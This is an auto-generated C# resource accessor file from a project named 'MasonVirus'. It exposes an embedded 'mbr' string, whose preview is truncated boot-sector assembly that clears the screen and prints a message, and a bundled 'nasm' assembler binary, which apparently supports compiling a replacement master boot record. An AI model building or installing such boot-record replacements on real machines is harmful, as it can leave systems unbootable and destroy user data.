//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace MasonVirus.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("MasonVirus.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to bits 16
        ///org 0x7C00
        ///
        ///start:
        ///    cli
        ///    xor ax, ax
        ///    mov ds, ax
        ///    mov es, ax
        ///    mov ss, ax
        ///    mov sp, 0x7C00
        ///    sti
        ///
        ///    mov ax, 0x0003
        ///    int 0x10
        ///
        ///    mov ax, 0x0600
        ///    mov bh, 0x40 
        ///    mov cx, 0x0000
        ///    mov dx, 0x184F
        ///    int 0x10
        ///
        ///    mov ah, 0x02
        ///    mov bh, 0x00
        ///    mov dh, 11
        ///    mov dl, 32
        ///    int 0x10 
        ///
        ///    mov si, message
        ///    mov ah, 0x0E
        ///    mov bh, 0x00
        ///    mov bl, 0x40 
        ///
        ///print_loop:
        ///    lodsb
        ///    cmp al, 0
        ///    je halt
        ///    cmp al, 10
        ///    jne print_c [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string mbr {
            get {
                return ResourceManager.GetString("mbr", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] nasm {
            get {
                object obj = ResourceManager.GetObject("nasm", resourceCulture);
                return ((byte[])(obj));
            }
        }
    }
}
